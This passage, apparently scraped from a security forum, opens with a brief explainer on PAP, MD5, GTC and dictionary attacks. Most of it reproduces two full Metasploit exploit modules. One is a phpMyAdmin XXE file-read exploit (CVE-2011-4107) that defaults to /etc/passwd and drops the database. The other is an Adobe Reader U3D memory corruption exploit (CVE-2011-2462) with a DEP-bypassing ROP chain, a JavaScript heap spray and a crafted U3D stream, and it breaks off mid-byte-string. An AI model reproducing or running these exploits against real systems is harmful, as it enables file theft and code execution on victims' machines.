on the fact that it can reproduce the hashed value of the password. [h=5]PAP[/h] PAP (Password Authentication Protocol) is described in RFC1334. PAP provides a simple method for the peer to establish its identity using a two-way handshake. PAP is not a strong authentication method. Passwords are sent over the connection in cleartext and there is no protection from playback or repeated trial and error attacks. [h=5]MD5[/h] MD5 (Message-Digest algorithm 5) is a widely used cryptographic hash function that results in a 128-bit hash value. The 128-bit (16-byte) MD5 hashes (also termed message digests) typically are represented as 32-digit hexadecimal numbers (for example, ec55d3e698d289f2afd663725127bace). EAP-MD-5 typically is not recommended for wireless LAN implementations because it may expose the user’s password, and because several collision-based weaknesses have been demonstrated. It provides for only one way authentication—there is no mutual authentication of wireless client and the network. And very importantly it does not provide a means to derive dynamic, per-session wired equivalent privacy (WEP) keys. [h=5]GTC[/h] Typically, password (PIN) information is read by a user from a token card device and entered as ASCII text into the client. GTC is similar to PAP in that passwords are sent in the clear. Notes from the Underground…—Dictionary Attacks Passwords can be broken in real-time (active) and offline (passive) modes. The premise of a dictionary attack is that by trying every possible combination or words (or tokens), an attacker ultimately will succeed in discovering user secret passwords. A dictionary attack relies on the fact that d. password is often a common word, name, or concatenation of words or names with a minor modification such as a trailing digit or two, Longer passwords with a variety of characters (such as ^Y2o4uEA16r3-2e64A12EFing!) offer the greatest protection against dictionary attacks. During an online dictionary attack, an attacker tries to actively gain network access by trying many possible combinations of passwords for a specific user. Online dic-tionary attacks can be prevented using password lockout mechanisms that lock out the user account after a certain number of invalid login attempts. Online attacks also generally show up in logs, which can indicate that this type of “loud” hacking activity occurred or is occurring. Offline attacks rely on the attacker’s ability to capture and record data from the datastream usually by using a sniffer such as tcpdump or ethereal. These captured data can then be compared at leisure against tables of hashes until a password ‘s discovered or the attacker gives up, The offline attacks can be thwarted by changing passwords regularly and limiting attackers’ access to the datastream. Sursa: Centrex or PBX: MS-CHAPv2

[h=1]phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection[/h] # Exploit Title: poc-phpmyadmin-local-file-inclusion-via-xxe-injection # Date: 12-01-2012 # Author: Marco Batista # Blog Link: http://www.secforce.com/blog/2012/01/cve-2011-4107-poc-phpmyadmin-local-file-inclusion-via-xxe-injection/ # Tested on: Windows and Linux - phpmyadmin versions: 3.3.6, 3.3.10, 3.4.0, 3.4.5, 3.4.7 # CVE : CVE-2011-4107 require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize super( 'Name' => 'phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection', 'Version' => '1.0', 'Description' => %q{Importing a specially-crafted XML file which contains an XML entity injection permits to retrieve a local file (limited by the privileges of the user running the web server). The attacker must be logged in to MySQL via phpMyAdmin. Works on Windows and Linux Versions 3.3.X and 3.4.X}, 'References' => [ [ 'CVE', '2011-4107' ], [ 'OSVDB', '76798' ], [ 'BID', '50497' ], [ 'URL', 'http://secforce.com/research/'], ], 'Author' => [ 'Marco Batista' ], 'License' => MSF_LICENSE ) register_options( [ Opt::RPORT(80), OptString.new('FILE', [ true, "File to read", '/etc/passwd']), OptString.new('USER', [ true, "Username", 'root']), OptString.new('PASS', [ false, "Password", 'password']), OptString.new('DB', [ true, "Database to use/create", 'hddaccess']), OptString.new('TBL', [ true, "Table to use/create and read the file to", 'files']), OptString.new('APP', [ true, "Location for phpMyAdmin URL", '/phpmyadmin']), OptString.new('DROP', [ true, "Drop database after reading file?", 'true']), ],self.class) end def loginprocess # HTTP GET TO GET SESSION VALUES getresponse = send_request_cgi({ 'uri' => datastore['APP']+'/index.php', 'method' => 'GET', 'version' => '1.1', }, 25) if (getresponse.nil?) print_error("no response for #{ip}:#{rport}") elsif (getresponse.code == 200) print_status("Received #{getresponse.code} from #{rhost}:#{rport}") elsif (getresponse and getresponse.code == 302 or getresponse.code == 301) print_status("Received 302 to #{getresponse.headers['Location']}") else print_error("Received #{getresponse.code} from #{rhost}:#{rport}") end valuesget = getresponse.headers["Set-Cookie"] varsget = valuesget.split(" ") #GETTING THE VARIABLES NEEDED phpMyAdmin = varsget.grep(/phpMyAdmin/).last pma_mcrypt_iv = varsget.grep(/pma_mcrypt_iv/).last # END HTTP GET # LOGIN POST REQUEST TO GET COOKIE VALUE postresponse = send_request_cgi({ 'uri' => datastore['APP']+'/index.php', 'method' => 'POST', 'version' => '1.1', 'headers' =>{ 'Content-Type' => 'application/x-www-form-urlencoded', 'Cookie' => "#{pma_mcrypt_iv} #{phpMyAdmin}" }, 'data' => 'pma_username='+datastore['USER']+'&pma_password='+datastore['PASS']+'&server=1' }, 25) if (postresponse["Location"].nil?) print_status("TESTING#{postresponse.body.split("'").grep(/token/).first.split("=").last}") tokenvalue = postresponse.body.split("'").grep(/token/).first.split("=").last else tokenvalue = postresponse["Location"].split("&").grep(/token/).last.split("=").last end valuespost = postresponse.headers["Set-Cookie"] varspost = valuespost.split(" ") #GETTING THE VARIABLES NEEDED pmaUser = varspost.grep(/pmaUser-1/).last pmaPass = varspost.grep(/pmaPass-1/).last return "#{pma_mcrypt_iv} #{phpMyAdmin} #{pmaUser} #{pmaPass}",tokenvalue # END OF LOGIN POST REQUEST rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, Rex::ConnectionError =>e print_error(e.message) rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e print_error(e.message) end def readfile(cookie,tokenvalue) #READFILE TROUGH EXPORT FUNCTION IN PHPMYADMIN getfiles = send_request_cgi({ 'uri' => datastore['APP']+'/export.php', 'method' => 'POST', 'version' => '1.1', 'headers' =>{ 'Cookie' => cookie }, 'data' => 'db='+datastore['DB']+'&table='+datastore['TBL']+'&token='+tokenvalue+'&single_table=TRUE&export_type=table&sql_query=SELECT+*+FROM+%60files%60&what=texytext&texytext_structure=something&texytext_data=something&texytext_null=NULL&asfile=sendit&allrows=1&codegen_structure_or_data=data&texytext_structure_or_data=structure_and_data&yaml_structure_or_data=data' }, 25) if (getfiles.body.split("\n").grep(/== Dumping data for table/).empty?) print_error("Error reading the file... not enough privilege? login error?") else print_status("#{getfiles.body}") end end def dropdatabase(cookie,tokenvalue) dropdb = send_request_cgi({ 'uri' => datastore['APP']+'/sql.php?sql_query=DROP+DATABASE+%60'+datastore['DB']+'%60&back=db_operations.php&goto=main.php&purge=1&token='+tokenvalue+'&is_js_confirmed=1&ajax_request=false', 'method' => 'GET', 'version' => '1.1', 'headers' =>{ 'Cookie' => cookie }, }, 25) print_status("Dropping database: "+datastore['DB']) end def run cookie,tokenvalue = loginprocess() print_status("Login at #{datastore['RHOST']}:#{datastore['RPORT']}#{datastore['APP']} using #{datastore['USER']}:#{datastore['PASS']}") craftedXML = "------WebKitFormBoundary3XPL01T\n" craftedXML << "Content-Disposition: form-data; name=\"token\"\n\n" craftedXML << tokenvalue+"\n" craftedXML << "------WebKitFormBoundary3XPL01T\n" craftedXML << "Content-Disposition: form-data; name=\"import_type\"\n\n" craftedXML << "server\n" craftedXML << "------WebKitFormBoundary3XPL01T\n" craftedXML << "Content-Disposition: form-data; name=\"import_file\"; filename=\"exploit.xml\"\n" craftedXML << "Content-Type: text/xml\n\n" craftedXML << "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n" craftedXML << "<!DOCTYPE ficheiro [ \n" craftedXML << " <!ENTITY conteudo SYSTEM \"file:///#{datastore['FILE']}\" >]>\n" craftedXML << "<pma_xml_export version=\"1.0\" xmlns:pma=\"http://www.phpmyadmin.net/some_doc_url/\">\n" craftedXML << " <pma:structure_schemas>\n" craftedXML << " <pma:database name=\""+datastore['DB']+"\" collation=\"utf8_general_ci\" charset=\"utf8\">\n" craftedXML << " <pma:table name=\""+datastore['TBL']+"\">\n" craftedXML << " CREATE TABLE `"+datastore['TBL']+"` (`file` varchar(20000) NOT NULL);\n" craftedXML << " </pma:table>\n" craftedXML << " </pma:database>\n" craftedXML << " </pma:structure_schemas>\n" craftedXML << " <database name=\""+datastore['DB']+"\">\n" craftedXML << " <table name=\""+datastore['TBL']+"\">\n" craftedXML << " <column name=\"file\">&conteudo;</column>\n" craftedXML << " </table>\n" craftedXML << " </database>\n" craftedXML << "</pma_xml_export>\n\n" craftedXML << "------WebKitFormBoundary3XPL01T\n" craftedXML << "Content-Disposition: form-data; name=\"format\"\n\n" craftedXML << "xml\n" craftedXML << "------WebKitFormBoundary3XPL01T\n" craftedXML << "Content-Disposition: form-data; name=\"csv_terminated\"\n\n" craftedXML << ",\n\n" craftedXML << "------WebKitFormBoundary3XPL01T--" print_status("Grabbing that #{datastore['FILE']} you want...") res = send_request_cgi({ 'uri' => datastore['APP']+'/import.php', 'method' => 'POST', 'version' => '1.1', 'headers' =>{ 'Content-Type' => 'multipart/form-data; boundary=----WebKitFormBoundary3XPL01T', 'Cookie' => cookie }, 'data' => craftedXML }, 25) readfile(cookie,tokenvalue) if (datastore['DROP'] == "true") dropdatabase(cookie,tokenvalue) else print_status("Database was not dropped: "+datastore['DB']) end end end Sursa: phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection

[h=1]Adobe Reader U3D Memory Corruption Vulnerability[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'zlib' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'Adobe Reader U3D Memory Corruption Vulnerability', 'Description' => %q{ This module exploits a vulnerability in the U3D handling within versions 9.x through 9.4.6 and 10 through to 10.1.1 of Adobe Reader. The vulnerability is due to the use of uninitialized memory. Arbitrary code execution is achieved by embedding specially crafted U3D data into a PDF document. A heap spray via JavaScript is used in order to ensure that the memory used by the invalid pointer issue is controlled. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r', 'juan vazquez', 'jduck' ], 'References' => [ [ 'CVE', '2011-2462' ], [ 'OSVDB', '77529' ], [ 'BID', '50922' ], [ 'URL', 'http://www.adobe.com/support/security/advisories/apsa11-04.html' ], [ 'URL', 'http://blog.vulnhunt.com/index.php/2011/12/12/cve-2011-2462-pdf-0day-analysis/' ], [ 'URL', 'http://blog.9bplus.com/analyzing-cve-2011-2462' ], [ 'URL', 'http://contagiodump.blogspot.com/2011/12/adobe-zero-day-cve-2011-2462.html' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'DisablePayloadHandler' => 'true', }, 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00", 'DisableNops' => true }, 'Platform' => 'win', 'Targets' => [ [ # Adobe Reader 9.4.0 / XP SP3 # Adobe Reader 9.4.5 / XP SP3 # Adobe Reader 9.4.6 / XP SP3 'Adobe Reader 9.4.0 / 9.4.5 / 9.4.6 on Win XP SP3', { # gadget from icucnv36: # mov ecx,dword ptr [eax+3Ch] # mov eax,dword ptr [ecx] # call dword ptr [eax+1Ch] 'Ret' => 0x4a8453c3 } ], ], 'DisclosureDate' => 'Dec 06 2011', #Needs to be checked 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class) end def junk(n=1) tmp = [] value = rand_text(4).unpack("L")[0].to_i n.times { tmp << value } return tmp end def exploit # DEP bypass; uses icucnv36.dll stack_data = [ junk, 0x0c0c0c0c, # mapped at 0x0c0c0c0c # becomes edi after stackpivot 0x0c0c0c0c, # becomes esi 0x4a806f29, # pop edi / pop esi / pop ebp / ret 14h 0x4a8a0000, # becomes edi 0x4a802196, # becomes esi 0x4a801f90, # becomes ebp 0x4a806f29, # pop edi / pop esi / pop ebp / ret 14h 0x4a806cef, # Stackpivot! xchg eax,esp (eax=0x0c0c0c0c) / xor al, al / pop edi / pop esi / ret # padding junk(4), 0x00000000, # becomes edi 0x00000002, # becomes esi 0x00000102, # becomes ebp 0x4a806f29, # pop edi / pop esi / pop ebp / ret 14h junk(5), 0x4a80a8a6, # becomes edi 0x4a801f90, # becomes esi 0x4a849038, # becomes ebp 0x4a8063a5, # pop ecx / ret junk(5), 0x4a8a0000, # becomes ecx 0x4a802196, # mov dword ptr [ecx],eax / ret # Stores eax (stack address) 0x4a801f90, # pop eax / ret 0x4a84903c, # becomes eax (import for CreateFileA) 0x4a80b692, # jmp dword ptr [eax] {kernel32!CreateFileA} 0x4a801064, # ret for CreateFileA # ret 0x00000000, # __in LPCTSTR lpFileName 0x10000000, # __in DWORD dwDesiredAccess 0x00000000, # __in DWORD dwShareMode 0x00000000, # __in_opt LPSECURITY_ATTRIBUTES lpSecurityAttributes 0x00000002, # __in DWORD dwCreationDisposition 0x00000102, # __in DWORD dwFlagsAndAttributes 0x00000000, # __in_opt HANDLE hTemplateFile 0x4a8063a5, # pop ecx / ret 0x4a801064, # becomes ecx 0x4a842db2, # xchg eax, edi / ret 0x4a802ab1, # pop ebx / ret 0x00000008, # becomes ebx 0x4a80a8a6, # and dword ptr [esp+ebx*2],edi (esp+ebx*2 = 0x0c0c0ce0, edi = {Result of CreateFileA}) / jne 4a80a8ae [br=1] / cmp al,2Fh / je 4a80a8ab [br=0] / cmp al,41h / jl 4a80a8ba [br=1] / cmp al,61h / jl 4a80a8c8) [br=1] / xor al,al / ret 0x4a801f90, # pop eax / ret 0x4a849038, # becomes eax (import for CreateFileA) 0x4a80b692, # jmp dword ptr [eax] {kernel32!CreateFileMappingA} 0x4a801064, # ret for CreateFileMappingA # ret 0xffffffff, # __in HANDLE hFile # mapped at 0c0c0ce0 => Stores Result of CreateFileA 0x00000000, # __in_opt LPSECURITY_ATTRIBUTES lpAttributes, 0x00000040, # __in DWORD flProtect, 0x00000000, # __in DWORD dwMaximumSizeHigh, 0x00010000, # __in DWORD dwMaximumSizeLow, 0x00000000, # __in_opt LPCTSTR lpName 0x4a8063a5, # pop ecx / ret 0x4a801064, # becomes ecx 0x4a842db2, # xchg eax, edi / ret 0x4a802ab1, # pop ebx / ret 0x00000008, # becomes ebx 0x4a80a8a6, # and dword ptr [esp+ebx*2],edi (esp+ebx*2 = 0x0c0c0d20, edi = {Result of FileMappingA}) / jne 4a80a8ae [br=1] / cmp al,2Fh / je 4a80a8ab [br=0] / cmp al,41h / jl 4a80a8ba [br=1] / cmp al,61h / jl 4a80a8c8) [br=1] / xor al,al / ret 0x4a801f90, # pop eax / ret 0x4a849030, # becomes eax (import for kernel32!MapViewOfFile) 0x4a80b692, # jmp dword ptr [eax] {kernel32!MapViewOfFile} 0x4a801064, # ret for MapViewOfFile # ret 0xffffffff, # __in HANDLE hFileMappingObject # mapped at 0x0c0c0d20 => {Result of FileMappingA} 0x00000022, # __in DWORD dwDesiredAccess 0x00000000, # __in DWORD dwFileOffsetHigh 0x00000000, # __in DWORD dwFileOffsetLow 0x00010000, # __in SIZE_T dwNumberOfBytesToMap 0x4a8063a5, # pop ecx / ret 0x4a8a0004, # becomes ecx 0x4a802196, # mov dword ptr [ecx],eax / ret # Stores result of MapViewOfFile 0x4a8063a5, # pop ecx / ret 0x4a801064, # becomes ecx 0x4a842db2, # xchg eax, edi / ret 0x4a802ab1, # pop ebx / ret 0x00000030, # becomes ebx 0x4a80a8a6, # and dword ptr [esp+ebx*2],edi (esp+ebx*2 = 0c0c0db8, edi = {Result of MapViewOfFile} / jne 4a80a8ae [br=1] / cmp al,2Fh / je 4a80a8ab [br=0] / cmp al,41h / jl 4a80a8ba [br=1] / cmp al,61h / jl 4a80a8c8) [br=1] / xor al,al / ret 0x4a801f90, # pop eax / ret 0x4a8a0004, # becomes eax {Result of MapViewOfFile} 0x4a80a7d8, # mov eax,dword ptr [eax] / ret 0x4a8063a5, # pop ecx / ret 0x4a801064, # becomes ecx 0x4a842db2, # xchg eax, edi / ret 0x4a802ab1, # pop ebx / ret 0x00000020, # becomes ebx 0x4a80a8a6, # and dword ptr [esp+ebx*2],edi (esp+ebx*2 = 0c0c0dbc, edi = {Result of MapViewOfFile} / jne 4a80a8ae [br=1] / cmp al,2Fh / je 4a80a8ab [br=0] / cmp al,41h / jl 4a80a8ba [br=1] / cmp al,61h / jl 4a80a8c8) [br=1] / xor al,al / ret 0x4a8063a5, # pop ecx / ret 0x4a801064, # becomes ecx 0x4a80aedc, # lea edx,[esp+0Ch] (edx => 0c0c0d94) / push edx {0c0c0d94} / push eax {Result of MapViewOfFile} / push dword ptr [esp+0Ch] ([0c0c0d8c] => 0x34) / push dword ptr [4a8a093c] ([4a8a093c] = 0x0) / call ecx (u 0x4a801064 => ret) / add esp, 10h / ret 0x4a801f90, # pop eax / ret 0x00000034, # becomes eax # mapped at 0c0c0d8c 0x4a80d585, # add eax, edx / ret (eax => 0c0c0dc8 => shellcode after ROP chain) 0x4a8063a5, # pop ecx / ret # mapped at 0c0c0d94 0x4a801064, # becomes ecx 0x4a842db2, # xchg eax,edi (edi becomes 0c0c0d8c, eax becomes Result of MapViewOfFile) / ret 0x4a802ab1, # pop ebx / ret 0x0000000a, # becomes ebx 0x4a80a8a6, # and dword ptr [esp+ebx*2],edi (esp+ebx*2 = 0c0c0dc0, edi = {shellcode after ROP chain} / jne 4a80a8ae [br=1] / cmp al,2Fh / je 4a80a8ab [br=0] / cmp al,41h / jl 4a80a8ba [br=1] / cmp al,61h / jl 4a80a8c8) [br=1] / xor al,al / ret 0x4a801f90, # pop eax / ret 0x4a849170, # becomes eax (import for MSVCR80!memcpy) 0x4a80b692, # jmp dword ptr [eax] {MSVCR80!memcpy} 0xffffffff, # ret for memcpy # mapped at 0c0c0db8 => Result of MapViewOfFile 0xffffffff, # dst (memcpy param) # mapped at 0c0c0dbc => Result of MapViewOfFile 0xffffffff, # src (memcpy param) # mapped at 0c0c0dc0 => Address of shellcode after ROP chain 0x00001000 # length (memcpy param) ].flatten.pack('V*') payload_buf = '' payload_buf << stack_data payload_buf << payload.encoded escaped_payload = Rex::Text.to_unescape(payload_buf) eip_ptr = [ junk(3), target.ret, # EIP junk(7), 0x0c0c0c0c, # [eax+3Ch] => becomes ecx / [0x0c0c0c0c] = 0x0c0c0c0c / [0x0c0c0c0c+1Ch] = 4a806cef => stackpivot junk(16), ].flatten.pack('V*') escaped_eip = Rex::Text.to_unescape(eip_ptr) js = <<-JS var padding; var bbb, ccc, ddd, eee, fff, ggg, hhh; var pointers_a, i; var x = new Array(); var y = new Array(); function alloc(bytes) { return padding.substr(0, (bytes - 6) / 2); } function spray_eip(esc_a) { pointers_a = unescape(esc_a); for (i = 0; i < 2000; i++) { x[i] = alloc(0x8) + pointers_a; y[i] = alloc(0x88) + pointers_a; y[i] = alloc(0x88) + pointers_a; y[i] = alloc(0x88) + pointers_a; } }; function spray_shellcode() { bbb = unescape('#{escaped_payload}'); ccc = unescape("%u0c0c"); ccc += ccc; while (ccc.length + 20 + 8 < (0x8000 + 0x8000)) ccc += ccc; i1 = 0x0c0c - 0x24; ddd = ccc.substring(0, i1 / 2); ddd += bbb; ddd += ccc; i2 = 0x4000 + 0xc000; eee = ddd.substring(0, i2 / 2); for (; eee.length < 0x40000 + 0x40000;) eee += eee; i3 = (0x1020 - 0x08) / 2; fff = eee.substring(0, 0x80000 - i3); ggg = new Array(); for (hhh = 0; hhh < 0x1e0 + 0x10; hhh++) ggg[hhh] = fff + "s"; } padding = unescape("#{escaped_eip}"); while (padding.length < 0x10000) padding = padding + padding; spray_shellcode(); spray_eip('%u4141'); this.pageNum = 2; JS js = js.gsub(/^\t\t/,'') if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate end u3d = make_u3d_stream xml = make_xml_data pdf = make_pdf(u3d, xml, js.to_s) print_status("Creating '#{datastore['FILENAME']}' file...") file_create(pdf) end def make_xml_data xml = %Q|<?xml version="1.0" encoding="UTF-8"?> <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"> <ed>kapa</ed> <config xmclns="http://www.microsoft.org/schema/xci/2.6/"> <present> <pdf> <version>1</version> <fjdklsajfodpsajfopjdsio>f</fjdklsajfodpsajfopjdsio> <interactive>1</interactive> </pdf> </present> </config> <template xmdfaflns="http://www.microsoft.org/schema/xffdsa-template/2f/"> <subform name="form1" layout="tb" locale="en_US"> <pageSet> </pageSet> </subform> </template> <template1 xmdfaflns="http://www.microsoft.org/schema/xffdsa-template/2f/"> <subform name="form1" layout="tb" locale="en_US"> <pageSet> </pageSet> </subform> </template1> <template2 xmdfaflns="http://www.microsoft.org/schema/xffdsa-template/2f/"> <subform name="form1" layout="tb" locale="en_US"> <pageSet> </pageSet> </subform> </template2> </xdp:xdp>| xml = xml.gsub(/^\t\t/, '') return xml end def u3d_pad(str, char="\x00") len = str.length % 4 if (len > 0) #puts "Adding %d pad bytes" % (4 - len) return (char * (4 - len)) end "" end def u3d_string(str) ([str.length].pack('v') + str) end def make_u3d_stream() # # REFERENCE: # http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-363%201st%20edition.pdf # The File format consists of these blocks: # [File Header Block][Declaration Block][Continuation Block] # Each block consists of (padding is used to keep fields 32-bit aligned): # [Block Type][Data Size][Metadata Size][Data][Data Padding][Meta Data][Meta Data Padding] # mc_name = u3d_string("CCCCBox01") mr_name = u3d_string("Box01RX") # build the U3D header (length will be patched in later) hdr_data = [0,0].pack('n*') # version info hdr_data << [0,0x24,0xa34,0,0x6a].pack('VVVVV') # 31337 was 0xa34 hdr = "U3D\x00" hdr << [hdr_data.length,0].pack('VV') hdr << hdr_data parent_node_data = "\x01\x00\x00\x00"+ # node count (1) "\x00\x00"+ # name (empty) # transform matrix [0x813f,0,0,0,0,0x813f,0,0,0,0,0x813f,0,0x548a55c0,0xa2027cc2,0,0x813f].pack('N*') model_node_data = "" model_node_data << mc_name model_node_data << parent_node_data model_node_data << mr_name model_node_data << [1].pack('V') # Model Visibility (Front visible) model_node = [0xffffff22,model_node_data.length,0].pack('VVV') #model_node = [0xffffff22,0x5e,0].pack('VVV') model_node << model_node_data bone_weight_data = "" bone_weight_data << mc_name bone_weight_data << [ 1, # Chain index 1, # Bone Weight Attributes (for a mesh) 0x3162123b, # Inverse Quant 0x14, # Position Count ].pack('VVNV') # Position List bone_weight_data << [ # 1 1, # Bone Weight Count 3, # Bone Index (no Quantized Weight) # 2 0x55550000, # Bone Weight Count 0x4c1df36e, # Bone Index 0x0200d002, # Quantized Weight # 3 0x95000074, # Bone Weight Count 0x66ccc357, # Bone Index 0x00000000 # Quantized Weight ].pack('VVNNNNNN') bone_weight = [0xffffff44,0x3a,0].pack('VVV') # We hardcode the length to match the old file.. (TODO: test if necessary) #bone_weight = [0xffffff44,bone_weight_data.length,0].pack('VVV') bone_weight << bone_weight_data new_objtype1_data = "\x05\x00\x52\x52\x52\x52\x52\x01\x00\x00\x00\xa6\x04\xa8\x96\xb9\x3f\xc5\x43\xb2\xdf\x2a"+ "\x31\xb5\x56\x93\x40\x00\x01\x00\x00\x00\x00\x00\x00\x05\x00\x52\x52\x52\x52\x52\x01\x00"+ "\x00\x00\x01\x00\x2e\x01\x00\x76\x00\x00\x00\x00" #new_objtype1 = [0xffffff16,0x38,0].pack('VVV') new_objtype1 = [0xffffff16,new_objtype1_data.length,0].pack('VVV') new_objtype1 << new_objtype1_data shading_modifier_data = "" shading_modifier_data << mc_name shading_modifier_data << "\x02\x00\x00\x00\x00\x00\x00\x00\x01"+ "\x00\x00\x00\x00\x00\x00\x00\x06\x00\x42\x6f\x02\x00\x00\x00" #shading_modifier = [0xffffff45,0x23,0].pack('VVV') shading_modifier = [0xffffff45,shading_modifier_data.length,0].pack('VVV') shading_modifier << shading_modifier_data new_objtype2_data = "\x01\x00\x52\x01\x00\x00\x00\xa6\x04\xa8\x96\xb9\x3f\xc5\x43\xb2"+ "\xdf\x2a\x31\xb5\x56\x93\x40\x00\x01\x00\x00\x00\x00\x00\x00\x01\x00\x52\x01\x00\x00\x00"+ "\x01\x00\x2e\x01\x00\x76\x00\x00\x00\x00" #new_objtype2 = [0xffffff16,0x30,0].pack('VVV') new_objtype2 = [0xffffff16,new_objtype2_data.length,0].pack('VVV') new_objtype2 << new_objtype2_data nodemod_decl = "" nodemod_decl << model_node nodemod_decl << u3d_pad(nodemod_decl) nodemod_decl << bone_weight nodemod_decl << u3d_pad(nodemod_decl) nodemod_decl << new_objtype1 nodemod_decl << u3d_pad(nodemod_decl) nodemod_decl << shading_modifier nodemod_decl << u3d_pad(nodemod_decl) nodemod_decl << new_objtype2 nodemod_decl << u3d_pad(nodemod_decl) nodemod_decl << # another modifier chain? "\x14\xff\xff\xff\xc0\x01\x00\x00\x00\x00\x00\x00"+ "\x07\x00\x42\x6f\x78\x30\x31\x52\x58\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00"+ "\x00\x00"+ # clod mesh generator (declaration) "\x31\xff\xff\xff\x9b\x01\x00\x00\x00\x00\x00\x00\x07\x00\x42\x6f\x78\x30\x31\x52"+ "\x58\x00\x00\x00\x00\x00\x00\x00\x00\x24\x00\x00\x00\x14\x00\x00\x00\x6c\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x2c\x01\x00\x00\x2c\x01\x00\x00\x2c"+ "\x01\x00\x00\x87\x52\x0a\x3d\xa6\x05\x6f\x3b\xa6\x05\x6f\x3b\x4a\xf5\x2d\x3c\x4a\xf5\x2d"+ "\x3c\x66\x66\x66\x3f\x00\x00\x00\x3f\xf6\x28\x7c\x3f\x04\x00\x00\x00\x07\x00\x53\x63\x61"+ "\x70\x75\x6c\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x07\x00\x48\x75\x6d\x65\x72\x75\x73\x07\x00\x53\x63\x61\x70\x75\x6c\x61\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x55\x6c\x6e\x61\x07\x00\x48\x75"+ "\x6d\x65\x72\x75\x73\x00\x00\x00\x00\x00\x00\x20\x41\x00\x00\x00\x00\x00\x00\x20\x41\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06"+ "\x00\x52\x61\x64\x69\x75\x73\x04\x00\x55\x6c\x6e\x61\x00\x00\x00\x00\x00\x00\x70\x41\x00"+ "\x00\x00\x00\x00\x00\x70\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00"+ # clod mesh generator (progressive mesh cont) "\x3c\xff\xff\xff\x6f\x01\x00\x00\x00\x00\x00\x00\x07\x00"+ "\x42\x6f\x78\x30\x31\x52\x58\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x94\x00\x00\x00\x50\x02\x00\x00\x28\x01"+ "\x00\x00\x7f\x75\x2f\x2b\x00\x00\x20\x73\x00\x00\xc3\x05\x00\x00\x00\x00\x00\x00\x80\x02"+ "\x45\xe4\x4c\x55\x01\x00\x00\xe0\x30\x03\x00\x00\xb0\x01\x00\x00\x00\x36\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x55\x55\x05\x00\x80\xa3\x2a\x00\xc0\xe1"+ "\x41\x6b\x92\xf2\xa4\x00\x00\x72\x87\x18\x4c\xd0\xda\x00\x00\x20\x46\xa9\x03\x00\x40\x8c"+ "\x00\x00\xa0\x7c\xa9\xa7\x10\x03\x00\x00\xc4\x09\x00\x00\x0d\xd2\x50\x85\x03\x72\x00\x80"+ "\x5c\x37\x19\xc1\xb9\x0f\x00\x20\x55\xf7\x13\x00\x40\x00\xdc\x1f\xf9\x2c\x35\x30\x6e\x06"+ "\x62\xb6\xea\x09\x2e\x7b\x28\xa4\x90\xe0\xb3\x63\x2c\x20\x92\x2a\x88\xbc\x06\x3a\xff\x80"+ "\x43\xb2\x00\x00\x00\x14\x62\x0e\x63\xb4\x04\x08\x47\x52\x20\x31\xca\x00\x00\xb4\x21\xe0"+ "\xd7\x01\x00\xa0\x1a\x72\x11\x71\xc2\x2c\x74\xc1\xa3\x56\xfa\x30\x03\x00\xe0\x7b\xd0\x62"+ "\x2a\x00\x40\x71\xfa\x6c\xc6\xcf\x07\x78\x81\xd0\x47\x3d\x58\x0e\x51\x0f\x2e\x27\x2d\xbe"+ 